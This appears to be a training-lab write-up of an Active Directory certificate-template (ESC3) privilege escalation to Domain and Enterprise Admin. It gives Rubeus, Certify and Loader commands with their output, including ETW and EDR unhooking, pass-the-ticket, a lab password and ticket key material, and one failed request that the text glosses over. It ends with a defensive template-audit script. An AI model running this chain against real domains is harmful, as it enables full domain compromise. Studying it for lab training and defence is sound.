 Volume Serial Number is 1A5A-FDE2

 Directory of c:\AD\Tools\3

11/28/2025  07:47 AM    <DIR>          .
11/28/2025  07:02 AM    <DIR>          ..
11/28/2025  07:06 AM             3,355 esc3-agent.pfx
11/28/2025  07:32 AM             4,014 esc3-da.pem
11/28/2025  07:13 AM             3,355 esc3-DA.pfx
11/28/2025  07:38 AM             4,062 esc3-da1.pem
11/28/2025  07:47 AM             3,395 esc3-da1.pfx
11/28/2025  07:05 AM             3,996 esc3.pem
01/02/2025  12:28 AM         1,342,976 Rubeus.exe
               7 File(s)      1,365,153 bytes
               2 Dir(s)   8,426,704,896 bytes free

c:\AD\Tools\3>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:administrator /certificate:esc3-da1.pfx /password:SecretPass@123 /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : asktgt /user:administrator /certificate:esc3-da1.pfx /password:SecretPass@123 /ptt
[*] Action: Ask TGT

[*] Got domain: dollarcorp.moneycorp.local
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIG4jCCBt6gAwIBBaEDAgEWooIFxjCCBcJhggW+MIIFuqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      <snip>
      ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/dollarcorp.moneycorp.local
  ServiceRealm             :  DOLLARCORP.MONEYCORP.LOCAL
  UserName                 :  administrator (NT_PRINCIPAL)
  UserRealm                :  DOLLARCORP.MONEYCORP.LOCAL
  StartTime                :  11/28/2025 7:49:03 AM
  EndTime                  :  11/28/2025 5:49:03 PM
  RenewTill                :  12/5/2025 7:49:03 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  G2QX0temy6Z0REK40MEHTg==
  ASREP (key)              :  02317191C2207D98FC106E4BD65EF794



c:\AD\Tools\3>klist

Current LogonId is 0:0x33116f1d

Cached Tickets: (1)

#0>     Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/28/2025 7:49:03 (local)
        End Time:   11/28/2025 17:49:03 (local)
        Renew Time: 12/5/2025 7:49:03 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

c:\AD\Tools\3>winrs -r:dcorp-dc cmd /c set computername
COMPUTERNAME=DCORP-DC


c:\AD\Tools\3>


——————————
next task

To escalate to Enterprise Admin, we only need to change the user named in the SmartCardEnrollment-Users request and in the Rubeus command that follows it.

Please note that we are using ‘/onbehalfof:mcorp\administrator’ here:

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123
c:\AD\Tools>C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : dcorp\student98

[*] Template                : SmartCardEnrollment-Users
[*] On Behalf Of            : mcorp\administrator

[*] Certificate Authority   : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[!] CA Response             : The submission failed: Error Verifying Request Signature or Signing Certificate  The revocation function was unable to check revocation because the revocation server was offline. 0x80092013 (-2146885613 CRYPT_E_REVOCATION_OFFLINE)
[!] Last status             : 0x80092013
[*] Request ID              : 36
[X] Error downloading certificate: System.Exception: Cert not yet issued yet! (iDisposition: 1)
   at ?????????????????????????????????????????.????????????????????????????????????????(String , Int32 )
   at ?????????????????????????????????????????.?????????????????????????????????????????(String , String , String , String , String , Boolean )


Certify completed in 00:00:10.4411528

c:\AD\Tools>


Convert the pem to esc3-DA.pfx using openssl and use the pfx with Rubeus:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc3-DA.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123 /ptt

Finally, access mcorp-dc!

winrs -r:mcorp-dc cmd /c  set username

C:\AD\Tools>winrs -r:mcorp-dc cmd /c  set username
mcorp\administrator

Flag 33 [dcorp-dc] – Name of the AD CS template that has ENROLLEE_SUPPLIES_SUBJECT 🚩

Using the C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject command, we can see that the name of the AD CS template that has ENROLLEE_SUPPLIES_SUBJECT is HTTPSCertificates:

CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : HTTPSCertificates
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email

Flag 34 [dcorp-dc] – Name of the AD CS template that has EKU of Certificate Request Agent and grants enrollment rights to Domain Users 🚩

The name of the AD CS template that has the EKU of Certificate Request Agent and grants enrollment rights to Domain Users is SmartCardEnrollment-Agent:

CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : SmartCardEnrollment-Agent
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Certificate Request Agent
    mspki-certificate-application-policy  : Certificate Request Agent

Flag 35 [dcorp-dc] – Name of the CA attribute that allows requestor to provide Subject Alternative Names 🚩

The name of the CA attribute that allows the requestor to provide Subject Alternative Names is EDITF_ATTRIBUTESUBJECTALTNAME2:

[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
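The template properties behind Flags 33 and 34 can also be audited straight from the Configuration partition without Certify. The PowerShell below is an added example, not part of the course material or of Certify; it assumes a domain-joined Windows host, and the flag bits, EKU OIDs and the Certificate-Enrollment right GUID are the documented MS-CRTD/AD values, while the CA config string in the last comment is the one from this lab.

```powershell
# Added audit script, not part of the CRTP walkthrough or of Certify: reads the templates
# from the Configuration partition and reports the conditions abused in this task.
# Assumes a domain-joined Windows host; any authenticated user can read templates.
$configNc = ([ADSI]'LDAP://RootDSE').configurationNamingContext
$tplRoot  = [ADSI]"LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNc"

$ENROLLEE_SUPPLIES_SUBJECT = 0x1      # msPKI-Certificate-Name-Flag bit (MS-CRTD)
$PEND_ALL_REQUESTS         = 0x2      # msPKI-Enrollment-Flag bit: CA manager approval
$OID_REQUEST_AGENT = '1.3.6.1.4.1.311.20.2.1'
$AuthEkus   = @('1.3.6.1.5.5.7.3.2', '1.3.6.1.4.1.311.20.2.2', '2.5.29.37.0')  # Client Auth, Smartcard Logon, Any Purpose
$EnrollGuid = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
$BroadPrincipals = 'Domain Users', 'Domain Computers', 'Authenticated Users', 'Everyone'
$ADRights = [System.DirectoryServices.ActiveDirectoryRights]

$findings = foreach ($tpl in $tplRoot.Children) {
    $p        = $tpl.Properties
    $name     = [string]$p['cn'].Value
    $nameFlag = [int]$p['msPKI-Certificate-Name-Flag'].Value
    $enrFlag  = [int]$p['msPKI-Enrollment-Flag'].Value
    $sigs     = [int]$p['msPKI-RA-Signature'].Value       # "Authorized Signatures Required"
    $ekus     = @($p['pKIExtendedKeyUsage'].Value)

    # Principals allowed to enroll: the Enroll extended right, all extended rights, or GenericAll
    $enrollers = $tpl.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount]) |
        Where-Object { $_.AccessControlType -eq 'Allow' -and (
            (($_.ActiveDirectoryRights -band $ADRights::GenericAll) -ne 0) -or
            ((($_.ActiveDirectoryRights -band $ADRights::ExtendedRight) -ne 0) -and
             ($_.ObjectType -eq $EnrollGuid -or $_.ObjectType -eq [guid]::Empty))) } |
        ForEach-Object { $_.IdentityReference.Value }
    $broad = $enrollers | Where-Object { $id = $_; $BroadPrincipals | Where-Object { $id -like "*$_" } }

    $issues = @()
    # ESC1 shape: requestor picks the subject, the cert can authenticate, nobody reviews the request
    if (($nameFlag -band $ENROLLEE_SUPPLIES_SUBJECT) -ne 0 -and ($ekus | Where-Object { $AuthEkus -contains $_ }) -and
        ($enrFlag -band $PEND_ALL_REQUESTS) -eq 0 -and $sigs -eq 0) { $issues += 'ENROLLEE_SUPPLIES_SUBJECT with auth EKU, no approval' }
    # ESC3 shape: Certificate Request Agent EKU, so the holder can request on behalf of other users
    if ($ekus -contains $OID_REQUEST_AGENT -and ($enrFlag -band $PEND_ALL_REQUESTS) -eq 0) { $issues += 'Certificate Request Agent EKU' }
    if ($issues -and $broad) {
        [pscustomobject]@{ Template = $name; Issues = $issues -join '; '; BroadEnrollers = ($broad | Sort-Object -Unique) -join ', ' }
    }
}
$findings | Format-Table -AutoSize

# Flag 35's setting is on the CA, not on a template; read it with certutil using the lab's CA config string:
# certutil -config "mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA" -getreg policy\EditFlags
```

In this lab the output should list HTTPSCertificates and SmartCardEnrollment-Agent with the issues shown in the Certify output above; a template with the Request Agent EKU is only a concern when, as here, a second template accepts agent-signed requests with no manager approval.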

Flag 36 [dcorp-dc] – Name of the group that has enrollment rights on the CA-Integration template 🚩

Using the Certify.exe find command, we can see the group that has enrollment rights on the CA-Integration template